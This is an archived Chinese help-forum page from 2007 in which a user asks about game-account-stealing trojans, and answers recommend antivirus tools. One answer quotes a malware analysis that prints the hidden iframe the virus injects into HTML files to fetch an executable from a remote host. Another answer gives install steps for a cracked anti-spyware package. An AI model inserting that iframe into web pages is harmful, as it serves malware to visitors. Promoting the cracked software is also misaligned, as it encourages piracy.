• 新记

    • 以下几种木马是什么?怎么杀?

    木马名称:Trojan/Win32.OnLineGamesT.gr
    木马名称:Trojan-PSW/Win32.OnLineGames.isb
    木马名称:Trojan/Win32.OnLineGames.ie
    木马名称:Trojan-PSW/Win32.OnLineGames.kcw
    木马名称:Trojan-PSW/Win32.OnLineGames.ksf

    今天突然发现卡巴6.0是灰色,然后弹出以上几个木马 还有就是 autorun.inf 卡巴一直杀不掉他们。。很伤心
    360也打不开了。。 卸载360 和卡巴6.0
    然后下栽最新 360+卡巴7.0 试用30天 更新病毒库。
    盗板XP 用360打上补丁。。杀木马和恶意插件。卡巴7.0杀了几次。
    以上几个木马和 autorun.inf 都不见了。。

    请问以上几个木马是什么呢?我是真的杀掉他们了吗??
    请教了。。详细点 请不要复制别人的回答

    举报该文章
    其他看法
    第1个回答  2007-12-15
    Trojan/Win32.OnLineGamesT.gr
    是木马,推荐使用AVG Anti-Spyware进行查杀。 这款软件目前可以查杀914948种间谍软件、广告软件、木马、拨号程序、后门程序、键盘记录程序和蠕虫。

    AVG Anti-Spyware是Grisoft公司的一款防木马软件,从2006年10月1日起改名为AVG Anti-Spyware7.5,它提供了针对因特网上传播的新一代安全威胁的有效解决方案,确保您的数据安全,保护您的隐私,抵御间谍软件、广告软件、木马、拨号程序、后门程序、键盘记录程序和蠕虫的威胁。
    在易于使用的界面之下,为您提供了高级的扫描和探测方式以及时下最尖端的技术。反病毒程序只能提供针对危急爆发的威胁如木马、蠕虫、拨号程序、劫持程序、间谍软件和键盘记录程序的有限的保护。而这正是AVG(ewido)anti-spyware保护的出发点,它能补充现有的安全应用程序从而创建一个完整的安全系统——因为只有完整的安全系统才能有效地工作。

    AVG Anti-Spyware V7.5.1.43 绿色汉化完美破解版安装说明:

    (1)如果您已经安装了AVG Anti-Spyware V7.5.1.43试用版、免费版或者其他免安装绿色版,使用前建议完全卸载已安装的版本。其他免安装绿色版的卸载方法为:运行“!!)卸载.bat”文件,然后将整个文件夹删除。
    (2)下载AVG Anti-Spyware V7.5.1.43 绿色汉化完美破解版,解压后运行“!!)绿化.bat”文件。如果您想使用右键扫描功能,运行“!!)绿化.bat”文件后,再运行“!!)右键安装.bat”即可。
    (3)双击“_avgas.exe”文件(注意,双击“_avgas.exe”,而不是双击“avgas.exe”),打开AVG Anti-Spyware V7.5.1.43。在通知区域右键单击AVG Anti-Spyware软件的图标,在弹出菜单中取消选中“随Windows启动”,然后单击“立即更新”按钮进行更新,更新完成后,再按照同样方法选中“随Windows启动”。至此,AVG Anti-Spyware V7.5.1.43 绿色汉化完美破解版安装完成。
    (4)如果您的机器安装了360安全卫士或者其他防火墙,安装时请选中“允许安装”单选按钮,然后单击“确定”按钮以完成安装。
    (5)本软件卸载方法为:打开AVG Anti-Spyware安装目录,运行“!!)卸载.bat”,然后将整个文件夹删除即可。

    trojan-PSW.Win32.OnlineGames.isb
    而且有的文件属性都变成番茄花园的了,是不是,

    这个病毒很早了,瑞星就杀得掉,不过你要在安全模式下进行

    看看这个帖子,
    我几天前中过,而且有很多exe文件属性还是 番茄花园 的

    重点看第五点

    今天发现此种病毒求助者见多 收到样本后 利马测试了一下
    该病毒就是前些日子流行的 修改系统时间的病毒之变种
    此次变种可谓是集N种破坏性病毒之大成了
    主要破坏功能有:1.感染exe 并使得被感染的exe的公司等属性变为 番茄花园
    2.感染html asp 等文件 插入恶意代码
    3.通过双击磁盘启动
    4.下载木马,盗取网游帐号
    5.修改注册表 使系统无法显示隐藏文件
    6.通过hook API 函数 导致任务管理器中 无法看见其进程
    分析报告如下:
    File:rising.exe
    Size: 64775 bytes
    File Version: 1.00
    MD5: 86311B37D938BB35645E7B092014DD63
    SHA1: 47C324A5A691DD31DC0410E51ADBD35065E6C7C3
    CRC32: 88ABBD9B
    病毒行为分析:
    1.rising.exe运行后 首先释放一个rising.eve的文件 然后由rising.exe启动他
    之后 释放139CA82A.EXE 139CA82A.dll(随机的8个数字字母组合成的文件名)到系统文件夹
    注册服务139CA82A.EXE
    139CA82A.EXE控制winlogon进程 使得139CA82A.dll插入几乎所有进程

    2.释放rising.exe 和autorun.inf 到每个分区 使得双击磁盘启动

    3.感染 除系统分区外的exe文件 使得其公司名全变为 番茄花园(被感染的exe运行后 会释放risng.exe和一个和被感染文件同名的扩展名为eve的文件,其实那个eve的文件就是被感染文件的源文件)

    4.感染 html asp 等文件 在其后面插入代码
    <iframe src="http://web.yulett.cn/count.htm" width="0" height="0" frameborder="0"></iframe>
    http://web.yulett.cn/count.htm下载的是http://www.xxxxsou8.cn/update3.exe
    经检测也是 rising.exe

    5.修改系统时间 随机把年份往前调 月,日不变
    可以用金山毒霸、瑞星或木马杀客试一下

    Trojan/Win32.OnLineGames.ie
    第2个回答  2007-12-15
    你没有用360安全卫士吗?杀木马很快的,也比较全,而且提供在线杀毒,专杀工具等等,很重要的是还是免费的,我用了好长时间了,觉得不错。
    第3个回答  2007-12-15
    因该是病毒

    远控木马有哪些
    远控木马主要包括以下几种类型:1. 远程控制木马:这是一种用于远程控制受害者计算机的恶意软件。攻击者通过植入这种木马,可以完全控制受害者的计算机,执行各种命令,如遥控操作、下载\/上传文件等。这种木马广泛应用于黑客攻击、网络犯罪及个人监控领域。例如,GH0ST就是一种典型的远程控制木马,它允许攻击者...

    以下几种木马是什么?怎么杀?
    是木马,推荐使用AVG Anti-Spyware进行查杀。 这款软件目前可以查杀914948种间谍软件、广告软件、木马、拨号程序、后门程序、键盘记录程序和蠕虫。AVG Anti-Spyware是Grisoft公司的一款防木马软件,从2006年10月1日起改名为AVG Anti-Spyware7.5,它提供了针对因特网上传播的新一代安全威胁的有效解决方案,...

    计算机木马包括以下几种类型
    1. 网络游戏木马 2. 网银木马 3. 通讯软件木马 4. 网页点击类木马 5. 下载类木马 6. 代理类木马 计算机木马(又名间谍程序)是一种后门程序,常被黑客用作控制远程计算机的工具。英文单词“Troj”,直译为“特洛伊”。"木马"程序是比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不...

    电脑木马简介
    为进一步了解木马,我们来看看它们的隐藏方式,木马隐藏方法主要有以下几种: 1.)在任务栏里隐藏 这是最基本的。如果在windows的任务来历出现一个莫名其妙的图标,傻子都会明白怎么回事。在VB中,只要把form的Viseble属性设置为False,ShowInTaskBar设为False程序就不会出现在任务栏里了。 2.)在任务管理器里隐藏 查看正在...

    如何杀除电脑木马病毒?
    使用恶性木马专杀工具查杀即可,操作步骤如下:1、以火绒安全软件为例,打开火绒安全软件,点击主页面右下角的“安全工具”;2、滑动鼠标,在菜单最下面找到“专杀工具”,点击进入;3、打开恶性木马专杀工具,点击“开始扫描”;4、等待扫描完成,会自动彻底清除木马病毒;5、点击“完成”,重启电脑后再...

    请高手解答!木马是什么?它有多少种?有什么办法去防预它?被木马入侵后有...
    特洛伊木马(以下简称木马),英文叫做“Trojan house”,其名称取自希腊神话的特洛伊木马记。它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,往往只能望“马”兴叹。所谓非授权...

    木马名称:Trojan.Generic的是什么病毒
    如何手动清除Trojan.Generic是什么木马?如何手动清除木马Trojan.generic杀不掉是杀毒错误造成的,解决方法为:打开360安全卫士,点击“木马查杀”选项卡。有三种查杀方式“快速查杀”、“全盘查杀”、“按位置查杀”。Trojan(特洛伊木马)木马病毒:该木马对抗安全软件能力非常强大,不仅能结束安全软件并删除部分...

    这十几种木马间谍病毒怎么杀?我是电脑小白
    对于其他病毒都是木马下载器,从黑客指定站点下载其它木马,并在被感染的计算机上自动运行。考虑你的病毒残留在临时文件夹里面 建议如下处理 注意清空临时文件夹 您好不用担心;既然杀毒软件能查出来就一定能杀,如果杀不了,是因为病毒在运行;正在运行的程序不能修改或删除的。那就建议你如下处理 重新启动...

    木马究竟是什么东西?
    甚至远程操控被种者的电脑。中了木马之后,可以使用电脑管家来查杀 电脑管家的杀毒部分采用的是4+1引擎,包含金山和腾讯两个国内最大的云查杀引擎以及以高查杀著称的德国小红伞本地引擎,查杀率非常的高,可以完美的清除各种顽固的木马病毒 腾讯电脑管家企业平台:http:\/\/zhidao.baidu.com\/c\/guanjia\/ ...

    电脑木马是什么啊?
    特洛伊木马(以下简称木马),英文叫做“Trojan house”,其名称取自希腊神话的特洛伊木马记。 它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。 所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,往往只能望“马”兴叹。 所谓非...

    相似回答
    大家正在搜
    相关问题
    谁帮我看下这是什么木马怎么杀掉?
    连续中了几种病毒和木马先杀哪个?
    这十几种木马间谍病毒怎么杀?我是电脑小白
    什么是木马,有什么特征?应该什么杀
    这是什么木马?怎么怎么杀都杀不掉?我也没下载过什么啊!
    木马查杀是什么?
    目前比较厉害的木马病毒是哪种呢?什么杀毒软件能够杀掉?
    电影木马病毒有几个种类查杀有什么方式?